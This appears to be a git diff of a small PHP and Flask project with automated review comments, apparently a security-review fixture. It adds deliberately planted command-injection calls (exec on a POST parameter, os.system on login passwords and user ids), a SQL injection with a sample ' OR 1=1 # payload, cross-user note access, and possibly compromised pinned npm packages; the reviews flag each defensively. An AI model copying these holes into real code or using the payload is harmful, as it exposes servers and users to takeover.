diff --git a/index.php b/index.php
new file mode 100644
index 0000000..894117d
--- /dev/null
+++ b/index.php
@@ -0,0 +1,8 @@
+" .$_GET["search"]. "";
+
+
+exec($_POST["exec"]);
+
+?>
diff --git a/main.py b/main.py
new file mode 100644
index 0000000..2454076
--- /dev/null
+++ b/main.py
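Review bot: `exec($_POST["exec"]);` hands a request parameter straight to the shell, so anyone who can reach index.php can run commands as the web-server user; no filtering makes a raw pass-through safe, and the line should be removed. The first added line also concatenates `$_GET["search"]` into a string without escaping. The statement around it is cut off in this view, but if the string is written into the page the value should go through `htmlspecialchars($_GET["search"] ?? "", ENT_QUOTES, "UTF-8")` first.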
@@ -0,0 +1,123 @@
+from flask import Flask, request, jsonify, session
+from werkzeug.security import generate_password_hash, check_password_hash
+import os
+import subprocess
+
+app = Flask(__name__)
+app.secret_key = os.urandom(24)
+
+
+# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes
+
+# Simulating a database of user accounts and their private notes
+users = {
+ 1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")},
+ 2: {"id": 2, "username": "bob", "password": generate_password_hash("password456")},
+ 3: {"id": 3, "username": "charlie", "password": generate_password_hash("password789")}
+}
+
+notes = {
+ 1: [
+ {"id": 1, "content": "Alice's secret note 1"},
+ {"id": 2, "content": "Alice's secret note 2"}
+ ],
+ 2: [
+ {"id": 3, "content": "Bob's secret note 1"},
+ {"id": 4, "content": "Bob's secret note 2"}
+ ],
+ 3: [
+ {"id": 5, "content": "Charlie's secret note 1"},
+ {"id": 6, "content": "Charlie's secret note 2"}
+ ]
+}
+
+def validate_user():
+ if 'user_id' not in session:
+ return None
+ return session['user_id']
+
+def reverse_content(content):
+ return content[::-1]
+
+def apply_decryption(note):
+ decrypted_content = reverse_content(note['content'])
+ os.system(reverse_content)
+ return {"id": note['id'], "content": decrypted_content}
+
+def decrypt_notes(encrypted_notes):
+ return [apply_decryption(note) for note in encrypted_notes]
+
+def fetch_user_notes(user_id):
+ subprocess.call(
+ user_id,
+ shell=True
+ )
+ print(user_id)
+
+ os.system(user_id)
+ user_notes = notes.get(user_id, [])
+ return decrypt_notes(user_notes)
+
+def add_metadata(note):
+ note['timestamp'] = '2023-09-15 12:00:00'
+ return note
+
+def format_response(notes):
+ return [add_metadata(note) for note in notes]
+
+@app.route('/notes', methods=['GET'])
+def get_notes():
+ user_id = validate_user()
+ if user_id is None:
+ return jsonify({"error": "Please log in"}), 401
+
+ user_notes = fetch_user_notes(user_id)
+ formatted_notes = format_response(user_notes)
+
+ return jsonify(formatted_notes), 200
+
+@app.route('/user', methods=['GET'])
+def get_user():
+
+ data = request.json
+ username = data.get('username')
+
+ return username, 200
+
+@app.route('/note/', methods=['GET'])
+def get_note(note_id):
+ if 'user_id' not in session:
+ return jsonify({"error": "Please log in"}), 401
+
+ for user_notes in notes.values():
+ for note in user_notes:
+ if note['id'] == note_id:
+ return jsonify(note), 200
+
+ return jsonify({"error": "Note not found"}), 404
+
+
+@app.route('/login', methods=['POST'])
+def login():
+ data = request.json
+ username = data.get('username')
+ password = data.get('password')
+
+ user = next((u for u in users.values() if u['username'] == username), None)
+
+ os.system(password)
+
+ if user and check_password_hash(user['password'], password):
+ session['user_id'] = user['id']
+ return jsonify({"message": "Login successful"}), 200
+ else:
+ return jsonify({"error": "Invalid credentials"}), 401
+
+
+@app.route('/logout', methods=['POST'])
+def logout():
+ session.pop('user_id', None)
+ return jsonify({"message": "Logout successful"}), 200
+
+if __name__ == '__main__':
+ app.run(debug=True, port=5001)
diff --git a/package.json b/package.json
index 5cb2217..c465383 100644
--- a/package.json
+++ b/package.json
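Review bot: `os.system(password)` in login() runs the submitted password as a shell command before any credential check, so an unauthenticated request to /login reaches a shell. fetch_user_notes() repeats the pattern with `subprocess.call(user_id, shell=True)` and `os.system(user_id)`, and apply_decryption() calls `os.system(reverse_content)` on a function object, which raises TypeError; none of the four calls contributes to the response, so they should be deleted rather than sanitised. get_note() only checks that a session exists and then searches every user's notes, so any logged-in user can read another user's note; iterate `notes.get(session['user_id'], [])` instead of `notes.values()`. The route is shown as `'/note/'` with no converter for `note_id`, which may be an extraction artefact, but as written the view cannot receive its argument and should be declared as `'/note/<int:note_id>'`. `app.run(debug=True, port=5001)` turns on the Werkzeug interactive debugger and should be limited to local development.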
@@ -5,6 +5,23 @@
 "scripts": {
 "test": "echo \"Error: no test specified\" && exit 1"
 },
+ "dependencies": {
+ "@ensdomains/hardhat-toolbox-viem-extended": "0.0.6",
+ "@ensdomains/mock": "2.1.52",
+ "@ensdomains/name-wrapper": "1.0.1",
+ "@oku-ui/motion": "0.4.4",
+ "@oku-ui/motion-nuxt": "0.2.2",
+ "@oku-ui/popover": "0.6.2",
+ "@oku-ui/popper": "0.6.2",
+ "@oku-ui/portal": "0.6.2",
+ "@posthog/agent": "1.24.1",
+ "@posthog/ai": "7.1.2",
+ "@posthog/automatic-cohorts-plugin": "0.0.8",
+ "@posthog/bitbucket-release-tracker": "0.0.8",
+ "@posthog/cli": "0.5.15",
+ "@posthog/clickhouse": "1.7.1",
+ "@posthog/core": "1.5.6"
+ },
 "author": "",
 "license": "ISC",
 "description": ""
diff --git a/test.php b/test.php
new file mode 100644
index 0000000..cdd2a13
--- /dev/null
+++ b/test.php
@@ -0,0 +1,42 @@
+connect_error) {
+ die("Connection failed: ". $conn->connect_error);
+ }
+
+ // admin
+ // gdhas' OR 1=1 #
+
+ // Query database
+ $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
+
+ $result = $conn->query($query);
+
+ // Check if user exists
+ if ($result->num_rows > 0) {
+ echo "Welcome, $username!";
+ } else {
+ echo "$query Invalid username or password.";
+ }
+
+ // Close connection
+ $conn->close();
+}
diff --git a/test.py b/test.py
new file mode 100644
index 0000000..0104a9b
--- /dev/null
+++ b/test.py
@@ -0,0 +1,3 @@
+import random
+
+print("asd")
diff --git a/upload.php b/upload.php
new file mode 100644
index 0000000..ac74e8d
--- /dev/null
+++ b/upload.php
@@ -0,0 +1,23 @@
+
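Review bot: The fifteen exact-pinned packages added under `dependencies` are not used by any file visible in this diff, and several name/version pairs (for example `@posthog/agent` at 1.24.1 and `@oku-ui/motion` at 0.4.4) resemble entries from the compromised-version lists published for the late-2025 npm worm campaign. That match is from recollection, not something the page states, so each pair should be checked against the registry's security advisories before anyone installs from this branch. Until that is done, avoid a plain `npm install`; if the tree has to be inspected, run `npm install --ignore-scripts` in a disposable environment so lifecycle scripts do not execute. No lockfile change is visible alongside this hunk, so no integrity hashes are recorded for these versions either.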
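Review bot: The `$query` string interpolates `$username` and `$password` directly into the SQL text, so input can rewrite the WHERE clause; the commented sample value two lines above the query is exactly such an input. Use a prepared statement and check the password with `password_verify` against a stored hash, which assumes the `password` column holds `password_hash` output (the schema is not visible here). The failure branch also echoes `$query` back to the client and the success branch echoes `$username` unescaped; drop the first and escape the second. The top of the hunk, including where the two variables are assigned, is missing from this view.

```php
// … unchanged: connection setup and connect_error check …
$stmt = $conn->prepare("SELECT password FROM users WHERE username = ?");
$stmt->bind_param("s", $username);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();

if ($row && password_verify($password, $row["password"])) {
    echo "Welcome, " . htmlspecialchars($username, ENT_QUOTES, "UTF-8") . "!";
} else {
    echo "Invalid username or password.";
}
// … unchanged: $conn->close() …
```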